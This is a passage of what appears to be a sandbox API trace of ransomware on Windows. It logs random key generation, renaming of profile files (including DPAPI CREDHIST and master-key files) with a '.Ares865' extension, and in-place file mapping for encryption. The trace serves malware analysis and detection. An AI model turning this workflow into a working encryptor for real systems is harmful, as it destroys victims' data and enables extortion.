dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0066.313] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0066.314] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0066.314] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\Default User\\Downloads\\desktop.ini.Ares865") returned 51 [0066.314] MoveFileExW (lpExistingFileName="C:\\Users\\Default User\\Downloads\\desktop.ini" (normalized: "c:\\users\\default user\\downloads\\desktop.ini"), lpNewFileName="C:\\Users\\Default User\\Downloads\\desktop.ini.Ares865" (normalized: "c:\\users\\default user\\downloads\\desktop.ini.ares865"), dwFlags=0x1) returned 1 [0066.315] CreateFileW (lpFileName="C:\\Users\\Default User\\Downloads\\desktop.ini.Ares865" (normalized: "c:\\users\\default user\\downloads\\desktop.ini.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x12c [0066.315] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=282) returned 1 [0066.315] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0066.316] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0066.316] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0066.316] CreateFileMappingW (hFile=0x12c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x420, lpName=0x0) returned 0x118 [0066.318] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x420) returned 0x190000 [0066.320] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2effc8) returned 1 [0066.320] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0066.320] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0066.324] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\Default User\\Desktop\\desktop.ini.Ares865") returned 49 [0066.324] MoveFileExW (lpExistingFileName="C:\\Users\\Default User\\Desktop\\desktop.ini" (normalized: "c:\\users\\default user\\desktop\\desktop.ini"), lpNewFileName="C:\\Users\\Default User\\Desktop\\desktop.ini.Ares865" (normalized: "c:\\users\\default user\\desktop\\desktop.ini.ares865"), dwFlags=0x1) returned 1 [0066.325] CreateFileW (lpFileName="C:\\Users\\Default User\\Desktop\\desktop.ini.Ares865" (normalized: "c:\\users\\default user\\desktop\\desktop.ini.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x12c [0066.325] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=282) returned 1 [0066.325] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2effc8) returned 1 [0066.326] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0066.326] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0066.326] CreateFileMappingW (hFile=0x12c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x420, lpName=0x0) returned 0x118 [0066.328] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x420) returned 0x190000 [0066.329] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2effc8) returned 1 [0066.329] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0066.329] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0066.330] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\Default User\\Cookies\\index.dat.Ares865") returned 47 [0066.330] MoveFileExW (lpExistingFileName="C:\\Users\\Default User\\Cookies\\index.dat" (normalized: "c:\\users\\default user\\cookies\\index.dat"), lpNewFileName="C:\\Users\\Default User\\Cookies\\index.dat.Ares865" (normalized: "c:\\users\\default user\\cookies\\index.dat.ares865"), dwFlags=0x1) returned 1 [0066.331] CreateFileW (lpFileName="C:\\Users\\Default User\\Cookies\\index.dat.Ares865" (normalized: "c:\\users\\default user\\cookies\\index.dat.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x12c [0066.331] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=16384) returned 1 [0066.331] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2effc8) returned 1 [0066.332] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0066.332] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0066.332] CreateFileMappingW (hFile=0x12c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x4300, lpName=0x0) returned 0x118 [0066.334] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x4300) returned 0x190000 [0066.335] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2effc8) returned 1 [0066.336] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0066.336] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0066.337] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\Default User\\Contacts\\Administrator.contact.Ares865") returned 60 [0066.337] MoveFileExW (lpExistingFileName="C:\\Users\\Default User\\Contacts\\Administrator.contact" (normalized: "c:\\users\\default user\\contacts\\administrator.contact"), lpNewFileName="C:\\Users\\Default User\\Contacts\\Administrator.contact.Ares865" (normalized: "c:\\users\\default user\\contacts\\administrator.contact.ares865"), dwFlags=0x1) returned 1 [0066.338] CreateFileW (lpFileName="C:\\Users\\Default User\\Contacts\\Administrator.contact.Ares865" (normalized: "c:\\users\\default user\\contacts\\administrator.contact.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x12c [0066.338] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=68382) returned 1 [0066.338] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2effc8) returned 1 [0066.339] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0066.339] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0066.339] CreateFileMappingW (hFile=0x12c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x10e20, lpName=0x0) returned 0x118 [0066.340] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x10e20) returned 0x190000 [0066.359] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f00d8) returned 1 [0066.359] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0066.359] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0066.361] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\Default User\\Contacts\\desktop.ini.Ares865") returned 50 [0066.361] MoveFileExW (lpExistingFileName="C:\\Users\\Default User\\Contacts\\desktop.ini" (normalized: "c:\\users\\default user\\contacts\\desktop.ini"), lpNewFileName="C:\\Users\\Default User\\Contacts\\desktop.ini.Ares865" (normalized: "c:\\users\\default user\\contacts\\desktop.ini.ares865"), dwFlags=0x1) returned 1 [0066.363] CreateFileW (lpFileName="C:\\Users\\Default User\\Contacts\\desktop.ini.Ares865" (normalized: "c:\\users\\default user\\contacts\\desktop.ini.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x12c [0066.363] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=412) returned 1 [0066.363] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f00d8) returned 1 [0066.364] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0066.364] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0066.364] CreateFileMappingW (hFile=0x12c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x4a0, lpName=0x0) returned 0x118 [0066.366] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x4a0) returned 0x190000 [0066.366] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f00d8) returned 1 [0066.367] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0066.367] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0066.369] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\Default User\\Application Data\\Microsoft\\Protect\\CREDHIST.Ares865") returned 73 [0066.369] MoveFileExW (lpExistingFileName="C:\\Users\\Default User\\Application Data\\Microsoft\\Protect\\CREDHIST" (normalized: "c:\\users\\default user\\application data\\microsoft\\protect\\credhist"), lpNewFileName="C:\\Users\\Default User\\Application Data\\Microsoft\\Protect\\CREDHIST.Ares865" (normalized: "c:\\users\\default user\\application data\\microsoft\\protect\\credhist.ares865"), dwFlags=0x1) returned 1 [0066.371] CreateFileW (lpFileName="C:\\Users\\Default User\\Application Data\\Microsoft\\Protect\\CREDHIST.Ares865" (normalized: "c:\\users\\default user\\application data\\microsoft\\protect\\credhist.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x12c [0066.372] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=24) returned 1 [0066.372] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f02f8) returned 1 [0066.373] CryptGenRandom (in: hProv=0x2f02f8, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0066.373] CryptReleaseContext (hProv=0x2f02f8, dwFlags=0x0) returned 1 [0066.373] CreateFileMappingW (hFile=0x12c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x320, lpName=0x0) returned 0x118 [0066.374] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x320) returned 0x190000 [0066.375] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f02f8) returned 1 [0066.376] CryptGenRandom (in: hProv=0x2f02f8, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0066.376] CryptReleaseContext (hProv=0x2f02f8, dwFlags=0x0) returned 1 [0066.377] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\Default User\\Application Data\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\be5b4fbd-cb99-45f5-9462-5f896dd3a6b9.Ares865") returned 147 [0066.377] MoveFileExW (lpExistingFileName="C:\\Users\\Default User\\Application Data\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\be5b4fbd-cb99-45f5-9462-5f896dd3a6b9" (normalized: "c:\\users\\default user\\application data\\microsoft\\protect\\s-1-5-21-3111613574-2524581245-2586426736-500\\be5b4fbd-cb99-45f5-9462-5f896dd3a6b9"), lpNewFileName="C:\\Users\\Default User\\Application Data\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\be5b4fbd-cb99-45f5-9462-5f896dd3a6b9.Ares865" (normalized: "c:\\users\\default user\\application data\\microsoft\\protect\\s-1-5-21-3111613574-2524581245-2586426736-500\\be5b4fbd-cb99-45f5-9462-5f896dd3a6b9.ares865"), dwFlags=0x1) returned 1 [0066.378] CreateFileW (lpFileName="C:\\Users\\Default User\\Application Data\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\be5b4fbd-cb99-45f5-9462-5f896dd3a6b9.Ares865" (normalized: "c:\\users\\default user\\application data\\microsoft\\protect\\s-1-5-21-3111613574-2524581245-2586426736-500\\be5b4fbd-cb99-45f5-9462-5f896dd3a6b9.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x12c [0066.378] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=468) returned 1 [0066.378] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f02f8) returned 1 [0066.379] CryptGenRandom (in: hProv=0x2f02f8, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0066.379] CryptReleaseContext (hProv=0x2f02f8, dwFlags=0x0) returned 1 [0066.379] CreateFileMappingW (hFile=0x12c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x4e0, lpName=0x0) returned 0x118 [0066.381] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x4e0) returned 0x190000 [0066.381] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f02f8) returned 1 [0066.382] CryptGenRandom (in: hProv=0x2f02f8, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0066.382] CryptReleaseContext (hProv=0x2f02f8, dwFlags=0x0) returned 1 [0066.383] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\Default User\\Application Data\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\Preferred.Ares865") returned 120 [0066.383] MoveFileExW (lpExistingFileName="C:\\Users\\Default User\\Application Data\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\Preferred" (normalized: "c:\\users\\default user\\application data\\microsoft\\protect\\s-1-5-21-3111613574-2524581245-2586426736-500\\preferred"), lpNewFileName="C:\\Users\\Default User\\Application Data\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\Preferred.Ares865" (normalized: "c:\\users\\default user\\application data\\microsoft\\protect\\s-1-5-21-3111613574-2524581245-2586426736-500\\preferred.ares865"), dwFlags=0x1) returned 1 [0066.383] CreateFileW (lpFileName="C:\\Users\\Default User\\Application Data\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\Preferred.Ares865" (normalized: "c:\\users\\default user\\application data\\microsoft\\protect\\s-1-5-21-3111613574-2524581245-2586426736-500\\preferred.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x12c [0066.384] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=24) returned 1 [0066.384] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f02f8) returned 1 [0066.384] CryptGenRandom (in: hProv=0x2f02f8, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0066.384] CryptReleaseContext (hProv=0x2f02f8, dwFlags=0x0) returned 1 [0066.385] CreateFileMappingW (hFile=0x12c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x320, lpName=0x0) returned 0x118 [0066.386] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x320) returned 0x190000 [0066.387] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f02f8) returned 1 [0066.388] CryptGenRandom (in: hProv=0x2f02f8, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0066.388] CryptReleaseContext (hProv=0x2f02f8, dwFlags=0x0) returned 1 [0066.389] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\Default User\\Application Data\\Microsoft\\Internet Explorer\\Quick Launch\\desktop.ini.Ares865") returned 99 [0066.389] MoveFileExW (lpExistingFileName="C:\\Users\\Default User\\Application Data\\Microsoft\\Internet Explorer\\Quick Launch\\desktop.ini" (normalized: "c:\\users\\default user\\application data\\microsoft\\internet explorer\\quick launch\\desktop.ini"), lpNewFileName="C:\\Users\\Default User\\Application Data\\Microsoft\\Internet Explorer\\Quick Launch\\desktop.ini.Ares865" (normalized: "c:\\users\\default user\\application data\\microsoft\\internet explorer\\quick launch\\desktop.ini.ares865"), dwFlags=0x1) returned 1 [0066.389] CreateFileW (lpFileName="C:\\Users\\Default User\\Application Data\\Microsoft\\Internet Explorer\\Quick Launch\\desktop.ini.Ares865" (normalized: "c:\\users\\default user\\application data\\microsoft\\internet explorer\\quick launch\\desktop.ini.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x12c [0066.390] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=146) returned 1 [0066.390] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f02f8) returned 1 [0066.391] CryptGenRandom (in: hProv=0x2f02f8, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0066.391] CryptReleaseContext (hProv=0x2f02f8, dwFlags=0x0) returned 1 [0066.391] CreateFileMappingW (hFile=0x12c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x3a0, lpName=0x0) returned 0x118 [0066.393] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x3a0) returned 0x190000 [0066.393] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f02f8) returned 1 [0066.394] CryptGenRandom (in: hProv=0x2f02f8, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0066.394] CryptReleaseContext (hProv=0x2f02f8, dwFlags=0x0) returned 1 [0066.394] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\Default User\\Application Data\\Microsoft\\Internet Explorer\\Quick Launch\\Shows Desktop.lnk.Ares865") returned 105 [0066.395] MoveFileExW (lpExistingFileName="C:\\Users\\Default User\\Application Data\\Microsoft\\Internet Explorer\\Quick Launch\\Shows Desktop.lnk" (normalized: "c:\\users\\default user\\application data\\microsoft\\internet explorer\\quick launch\\shows desktop.lnk"), lpNewFileName="C:\\Users\\Default User\\Application Data\\Microsoft\\Internet Explorer\\Quick Launch\\Shows Desktop.lnk.Ares865" (normalized: "c:\\users\\default user\\application data\\microsoft\\internet explorer\\quick launch\\shows desktop.lnk.ares865"), dwFlags=0x1) returned 1 [0066.395] CreateFileW (lpFileName="C:\\Users\\Default User\\Application Data\\Microsoft\\Internet Explorer\\Quick Launch\\Shows Desktop.lnk.Ares865" (normalized: "c:\\users\\default user\\application data\\microsoft\\internet explorer\\quick launch\\shows desktop.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x12c [0066.395] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=290) returned 1 [0066.396] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f02f8) returned 1 [0066.396] CryptGenRandom (in: hProv=0x2f02f8, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0066.396] CryptReleaseContext (hProv=0x2f02f8, dwFlags=0x0) returned 1 [0066.396] CreateFileMappingW (hFile=0x12c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x430, lpName=0x0) returned 0x118 [0066.398] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x430) returned 0x190000 [0066.399] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f02f8) returned 1 [0066.399] CryptGenRandom (in: hProv=0x2f02f8, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0066.399] CryptReleaseContext (hProv=0x2f02f8, dwFlags=0x0) returned 1 [0066.400] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\Default User\\Application Data\\Microsoft\\Internet Explorer\\Quick Launch\\Window Switcher.lnk.Ares865") returned 107 [0066.400] MoveFileExW (lpExistingFileName="C:\\Users\\Default User\\Application Data\\Microsoft\\Internet Explorer\\Quick Launch\\Window Switcher.lnk" (normalized: "c:\\users\\default user\\application data\\microsoft\\internet explorer\\quick launch\\window switcher.lnk"), lpNewFileName="C:\\Users\\Default User\\Application Data\\Microsoft\\Internet Explorer\\Quick Launch\\Window Switcher.lnk.Ares865" (normalized: "c:\\users\\default user\\application data\\microsoft\\internet explorer\\quick launch\\window switcher.lnk.ares865"), dwFlags=0x1) returned 1 [0066.400] CreateFileW (lpFileName="C:\\Users\\Default User\\Application Data\\Microsoft\\Internet Explorer\\Quick Launch\\Window Switcher.lnk.Ares865" (normalized: "c:\\users\\default user\\application data\\microsoft\\internet explorer\\quick launch\\window switcher.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x12c [0066.401] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=272) returned 1 [0066.401] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f02f8) returned 1 [0066.401] CryptGenRandom (in: hProv=0x2f02f8, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0066.401] CryptReleaseContext (hProv=0x2f02f8, dwFlags=0x0) returned 1 [0066.402] CreateFileMappingW (hFile=0x12c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x410, lpName=0x0) returned 0x118 [0066.403] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x410) returned 0x190000 [0066.404] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f02f8) returned 1 [0066.405] CryptGenRandom (in: hProv=0x2f02f8, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0066.405] CryptReleaseContext (hProv=0x2f02f8, dwFlags=0x0) returned 1 [0066.406] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\Default User\\Application Data\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\desktop.ini.Ares865") returned 119 [0066.406] MoveFileExW (lpExistingFileName="C:\\Users\\Default User\\Application Data\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\desktop.ini" (normalized: "c:\\users\\default user\\application data\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\desktop.ini"), lpNewFileName="C:\\Users\\Default User\\Application Data\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\desktop.ini.Ares865" (normalized: "c:\\users\\default user\\application data\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\desktop.ini.ares865"), dwFlags=0x1) returned 1 [0066.406] CreateFileW (lpFileName="C:\\Users\\Default User\\Application Data\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\desktop.ini.Ares865" (normalized: "c:\\users\\default user\\application data\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\desktop.ini.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x12c [0066.407] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=211) returned 1 [0066.407] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f02f8) returned 1 [0066.408] CryptGenRandom (in: hProv=0x2f02f8, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0066.408] CryptReleaseContext (hProv=0x2f02f8, dwFlags=0x0) returned 1 [0066.408] CreateFileMappingW (hFile=0x12c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x3e0, lpName=0x0) returned 0x118 [0066.410] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x3e0) returned 0x190000 [0066.410] CryptAcquireContextW (in: 